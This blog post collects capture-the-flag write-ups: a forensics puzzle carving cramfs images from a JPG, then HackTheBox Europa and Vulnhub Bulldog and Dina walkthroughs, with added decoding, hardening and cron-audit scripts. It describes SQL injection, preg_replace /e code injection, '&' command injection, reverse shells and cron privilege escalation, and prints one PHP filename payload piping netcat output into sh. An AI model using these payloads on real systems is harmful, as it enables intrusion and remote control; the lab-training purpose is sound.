Writings of Anders Ernstpriis Kusk.

mail: a@rce.sh


NC3CTF2017 – Task 1 – Pixelated

Made by yours truly.

The renowned cubist artist J. Tüddel has been robbed. A draft of his next masterpiece “Dådyr i knibe” (“Fallow Deer in Trouble”) has been stolen. Fortunately, Tüddel stored the draft in a convoluted way, so that the perpetrator would not simply be able to sell it on. 5 days after the theft the notorious criminal K. Pløs is arrested on suspicion of the theft. In his pocket a USB stick containing a file is found. Does this file really contain Tüddel's square masterpiece?

Software used: binwalk, cramfs, python

Once the file has been downloaded, you can use a hex editor (HxD on Windows, wxHexEditor/xxd on Linux) to check the start and end of the file. The file is labelled as a JPG image. Such a file will normally start with the hex values FF D8 and end with FF D9. Here we see that the file starts with FF D8.

At the end, however, it does not end with FF D9. Suspicious!

With -e, binwalk can carve/extract data from the file. We can see that the extracted files contain various other files, e.g. several file systems.

Finally we have two cramfs file systems. binwalk cannot extract files from these, so we have to mount them to a directory. For that you need cramfs installed on your computer. After mounting the .cramfs file we find two text files in the file system. One file consists of a short text.

The other consists of a single line of hex-like text. If we replace every “x” with a newline and count the lines, we see that we have 89700 hex values. Since 300×300 is 90000, we can make a reasonable guess that each hex value represents roughly one pixel in an image.

By inserting newlines the same way and then sorting and removing all non-unique hex values, we can see that the text contains 8 different hex values. Let us assume that each of them represents a colour in the image.

We can then write a Python script that walks through the file and produces an image. See the #comments in the code.
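An added example (not the author's script, which is not reproduced on the page) of how such a script can be built: it splits the text on “x”, checks the token count and the number of distinct values, maps each distinct value to a fixed palette entry and writes a 300×300 PPM image. The input is a constructed 89700-token string standing in for the real file; the eight hex tokens and the palette colours are assumptions.

```python
import random

WIDTH, HEIGHT = 300, 300

# Eight constructed hex tokens standing in for the 8 distinct values found in
# the text file; the real file is not reproduced here.
PALETTE_TOKENS = ["00", "1f", "3a", "55", "7e", "a1", "c4", "ff"]
# A fixed palette so the same token always maps to the same RGB colour.
PALETTE = [(0, 0, 0), (255, 255, 255), (255, 0, 0), (0, 255, 0),
           (0, 0, 255), (255, 255, 0), (0, 255, 255), (255, 0, 255)]


def make_sample(count=89700, seed=1):
    """Constructed input: 'x'-separated hex tokens, like the file on the cramfs image."""
    rng = random.Random(seed)
    return "x".join(rng.choice(PALETTE_TOKENS) for _ in range(count))


def parse_tokens(text):
    """Split on 'x' (the separator the write-up replaced with newlines) and drop empties."""
    return [t for t in text.strip().split("x") if t]


def build_pixels(tokens, width=WIDTH, height=HEIGHT):
    """Map each token to a palette colour, row by row; pad a short file with black."""
    distinct = sorted(set(tokens))  # deterministic mapping, like sort | uniq
    if len(distinct) > len(PALETTE):
        raise ValueError("more distinct values than palette entries: %d" % len(distinct))
    colour = {tok: PALETTE[i] for i, tok in enumerate(distinct)}
    pixels = [colour[t] for t in tokens]
    pixels += [(0, 0, 0)] * (width * height - len(pixels))  # 89700 < 90000
    return pixels[: width * height]


def write_ppm(path, pixels, width=WIDTH, height=HEIGHT):
    """Plain-text PPM (P3) needs no imaging library; most viewers open it."""
    with open(path, "w") as fh:
        fh.write("P3\n%d %d\n255\n" % (width, height))
        for r, g, b in pixels:
            fh.write("%d %d %d\n" % (r, g, b))


if __name__ == "__main__":
    toks = parse_tokens(make_sample())
    print(len(toks), "tokens,", len(set(toks)), "distinct")  # 89700 tokens, 8 distinct
    write_ppm("out.ppm", build_pixels(toks))
```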

And finally we get the image, more or less.

HackTheBox.eu – Europa

Created by ch4p

Software used: nmap, burp, netcat

As always, nmap first.

So basically ssh,http and https.

Visiting http and https gives us a boring “Just installed” page. Dirbuster gives us nothing. So let's take a look at the SSL certs.

One e-mail found. Might become handy later.

Two new hostnames found, one which seems very interesting. So for easy access I added them to my /etc/hosts file.

A login page. Tried a couple of default user/password combinations. Nothing. No software name found, so the login page looks homemade. Maybe SQL injection will do the trick?

I configured the browser to use my Burp proxy intercept and played around with the variables and some pretty standard SQL injection. I found that only the email variable was open to SQL injection.

And we are in.

Looking around the site, I found an OpenVPN Config Generator under the “Tools” page. The generator has one input (not visible here) which asks for an IP. After submitting, the IP is inserted into the displayed config text. Playing around with it showed that the generator was using the preg_replace regex function in PHP. This can be bad (and good for me), since it can open up for command injection. This article describes it:

Most modifiers are quite harmless and let you do things like case-insensitive and multi-line searches, however one modifier, “e” will cause PHP to execute the result of the preg_replace() operation as PHP code. Let me just restate:

Setting the e regex modifier will cause PHP to execute the replacement value as code.

Why does PHP have this option? I have no idea, and it’s actually been deprecated in later revisions (PHP >= 5.5.0) because of its recklessly insecure nature. Many people are still using PHP 5.2 or moving onto PHP 5.3, and even when deprecated the option will still work (it’ll generate a warning at a log level turned off by default), so the issue will be around for a while yet.

So we have to insert a /e in order to exploit this. Using Burp to catch the POST data, I modified the data and added a %2Fe (%2F is a URL-encoded forward slash). I decided to grab a php-reverse-shell and place it on the webserver in the folder /vendor, which I knew existed.

The intercepted command ready for forwarding.

I also needed to provide the php-reverse-shell file from my workstation.

And I needed to have netcat ready for the reverse shell before I visited https://admin-portal.europacorp.htb/vendor/re2.php. When I visited the URL the reverse shell connected back and I got my shell as the “www-data” user.

The www-data user was enough to get the user flag. But not enough for the root flag.

Looking around for setuid files and other typically exploitable files, I found that cron runs a script as root every minute.

The script is a PHP script that clears the access log. Furthermore it executes /var/www/cmd/logcleared.sh, which doesn't exist.

Since cron runs the PHP script as root, logcleared.sh will also run as root. Knowing that, it was easy to see how that could be exploited. I created logcleared.sh and set it to copy the flag to /tmp and change its permissions to make it readable.

And made logcleared.sh executable.

And then there was a root flag!

Vulnhub.com – Bulldog

Created by Nick Frichette

Software used: nmap, dirbuster, netcat

Nmap showed SSH running on the typical telnet port and two Python-based HTTP servers on ports 80 and 8080.

Visiting the webserver on port 80 gave nothing of value. Running dirbuster against it gave a few interesting directories.

The /dev/ directory showed a page and a link to a weird non-functioning site.

The source for the website showed a couple of possible usernames (before each @) and an md5sum for each user. Searching Google for each hash showed that the hashed word for nick was “bulldog”.

/admin/ was a Django login page. Using the username nick with the password “bulldog” worked.

The actual site didn't have any functionality.

Looking further around and visiting the web-shell link on “/dev/” again showed that the webshell page had changed. It now featured a kind of webshell with a few commands and a textarea with the output. Trying to run two commands with “;” didn't work. Browsing around the filesystem showed the source for the Django application in the file “views.py”:

from django.shortcuts import render
import subprocess

# Allow-list of command names; validate() only checks that one of them
# appears somewhere in the submitted string.
commands = ['ifconfig', 'ls', 'echo', 'pwd', 'cat', 'rm']

def homepage(request):
    return render(request, 'index.html')

def notice(request):
    return render(request, 'notice.html')

def dev(request):
    return render(request, 'dev.html')

def shell(request):
    if request.method == "POST":
        command = request.POST.get("command", None)
        to_return = "Command : " + command + "\n\n"

        if validate(command):
            # shell=True hands the whole string to /bin/sh, so "&", "|" etc. are honoured
            execute = subprocess.check_output(command, shell=True)
            to_return += execute
        elif ";" in command:
            pass  # the body of this branch is not shown on the page

        context = {'data': to_return}
        return render(request, 'shell.html', context)
    return render(request, 'shell.html')

def validate(command):
    # Substring match on an allowed name plus a ";" blacklist; nothing else is rejected.
    if any(com in command for com in commands) and ";" not in command:
        return True
    return False

From the source I could read that the program wasn't secured against using “&”. As long as an allowed command was somewhere in the command line and there was no “;”, anything else could be included after a “&”.
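To make the gap concrete, here is an added example (not code from the box or from the original write-up) that places the validate() logic from views.py beside a hardened replacement: it tokenises the input with shlex, requires the first token to be exactly an allowed program, refuses shell metacharacters and never uses shell=True. The hardened function names are my own.

```python
import shlex
import subprocess

# The allow-list from views.py.
commands = ['ifconfig', 'ls', 'echo', 'pwd', 'cat', 'rm']


def validate_vulnerable(command):
    """The filter as found on the box: any allowed name anywhere in the string
    passes, and only ';' is blacklisted, so 'ls & <anything>' reaches /bin/sh."""
    if any(com in command for com in commands) and ";" not in command:
        return True
    return False


def parse_allowed(command):
    """Hardened replacement (hypothetical): tokenise like a shell would, require
    the first token to be exactly an allowed program and refuse any token that
    carries shell metacharacters. Returns argv, or None when rejected."""
    try:
        argv = shlex.split(command)
    except ValueError:          # unbalanced quotes
        return None
    if not argv or argv[0] not in commands:
        return None
    meta = set("&|;`$<>(){}\n")
    if any(meta & set(tok) for tok in argv):
        return None
    return argv


def run_allowed(command):
    """Execute only what parse_allowed() accepted, and without shell=True, so the
    argv list reaches execve() untouched: even if a metacharacter slipped through
    it would be passed as a literal argument, never interpreted by a shell."""
    argv = parse_allowed(command)
    if argv is None:
        return None
    return subprocess.check_output(argv).decode("utf-8", "replace")
```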

So the easy thing would be to wget a reverse shell and run it. First I needed a Python HTTP server to serve a Perl reverse shell. I then ran “ls & wget -O /home/django” in the web-shell. And then “ls & perl /home/django/perl-reverse-shell.pl” to connect to an already running netcat session on my workstation.

And we got a shell. This time running as the user “django”.

Looking around for a way to privesc, I found the cronjob in /etc/cron.d/runAV which ran a Python script every minute as root. The script didn't do anything and its permissions allowed it to be edited by everyone.

So I added the Python os package for the os.system function to run a command. Then I added a line which would execute a new reverse shell that I had already wgetted.

And after a minute my new netcat session was connected to by the new reverse shell. This time I had root and was able to read the flag.
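Both the Europa and the Bulldog root steps came from a cron job running, as root, a script that was either missing from a directory a low-privileged user could write to, or was itself world-writable. The following added example (not from either box) audits cron.d-style entries for exactly those two conditions; the cron lines and the scratch directory it builds are constructed for the demonstration, and the function names are assumptions.

```python
import os
import stat
import tempfile

# Constructed cron.d-style entries (fields: min hour dom mon dow user command);
# neither the real runAV file nor the Europa cleanup script is reproduced here.
SAMPLE_CRON = ("* * * * * root /tmp/av/runAV.py\n"
               "* * * * * root /tmp/av/logcleared.sh\n")

def cron_d_commands(text):
    """Yield (user, program) per active entry; program is the command's first word."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in "#@":
            continue
        fields = line.split(None, 6)
        if len(fields) == 7:
            yield fields[5], fields[6].split()[0]

def risky(path):
    """Findings for a program cron runs as root: missing, writable by others, or
    (when missing) inside a directory others can write to."""
    findings, target = [], path
    if not os.path.lexists(path):
        findings.append("missing")
        target = os.path.dirname(path)  # whoever can write here supplies the script
    st = os.stat(target)
    if st.st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    if st.st_uid != 0:
        findings.append("not-root-owned")
    return findings

def audit(cron_text):
    """Map each program run as root to its findings (empty list = nothing flagged)."""
    return {p: risky(p) for user, p in cron_d_commands(cron_text) if user == "root"}

def build_demo():
    """Scratch tree mirroring the write-ups: a world-writable runAV.py (Bulldog) and
    a logcleared.sh that does not exist yet in a directory anyone can write to (Europa)."""
    av = os.path.join(tempfile.mkdtemp(), "av")
    os.mkdir(av)
    os.chmod(av, 0o777)
    script = os.path.join(av, "runAV.py")
    open(script, "w").close()
    os.chmod(script, 0o666)
    report = audit(SAMPLE_CRON.replace("/tmp/av", av))
    return {os.path.basename(k): v for k, v in report.items()}
```

Running build_demo() flags runAV.py as world-writable and logcleared.sh as missing inside a world-writable directory; on a real host you would feed it the contents of the files under /etc/cron.d instead.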

Vulnhub.com – Dina

Created by Touhid Shaikh

Software used: nmap, dirbuster, netcat

A beginner CTF VM from vulnhub. Easy and quick to do.

First a look at the box with nmap. Only an HTTP server open.

Visiting the website didn't give anything useful. Running dirbuster against the server gave a few interesting files and directories.

/nothing/pass was a text file with what looked like passwords.

After downloading the backup.zip file and opening it, I found that it was password protected. The password “freedom” from the pass file opened the zip file and extracted “backup-cred.mp3”. This file was also a text file and contained a username and a URL.

Visiting the URL showed that it was hosting something called playSMS. Using the username “touhid” and the password “diana” from the pass file, I was able to log in.

Searching exploit-db for playSMS showed that there was an exploit in the file upload function.

Unrestricted File Upload:

Any registered user can upload any file because of improper validation of the file in sendfromfile.php.

Code Execution using $filename

Now we know sendfromfile.php accepts any file extension and just reads the content, which is not stored on the server. But there is a bug: when a user uploads, for example, mybackdoor.php, the server accepts it happily but does not store it in any folder, so our shell is useless. But if the user changes the file name from “mybackdoor.php” to “.php”, then the server checks the file and sets some parameter $filename=”.php”; you can see the code below, and $filename is displayed on the page.

When uploading a file, playSMS will display the filename of the uploaded file on the webpage. So by uploading a file whose filename contains PHP code, the PHP code will be executed server-side. The problem is that a filename can't contain a lot of useful characters, e.g. a forward slash. So we will not be able to do much directory traversal other than to a parent directory. Sooo what to do?

Well, at least I can take a look in the parent directory. I uploaded a file with the filename “a.png” which listed all files recursively from the parent directory including their permissions. That way I could see which folders I could write to. It looks like “tmp” and “uploads” have the right permissions for everybody to upload.

Next up I created a small script that would download a reverse shell from my workstation and execute it. I then configured netcat to send the script to anybody who would connect.

A quick Python HTTP server to serve the reverse shell.

I then created a file called “a<?php system(“nc 4444 sh”); ?>.png” which, when uploaded, would connect to my netcat session on port 4444, receive the script and execute it with a shell.

Since the script would download and execute the Perl script, which would connect to my workstation on port 4445, I needed to configure a netcat session on that port. After uploading the file, playSMS ran netcat, which downloaded my script and executed it. The script downloaded my reverse shell and executed it, and the reverse shell connected to my other netcat session and gave me a shell.

I was now inside as the www-data user. A quick test showed that the www-data user had permission to run perl with sudo. Easy stuff.

So I wgetted a new reverse shell, this time configured to connect to another netcat session on port 4446. I ran the reverse shell with sudo and got a new reverse shell, this time with root rights. I now had the root flag! Easy.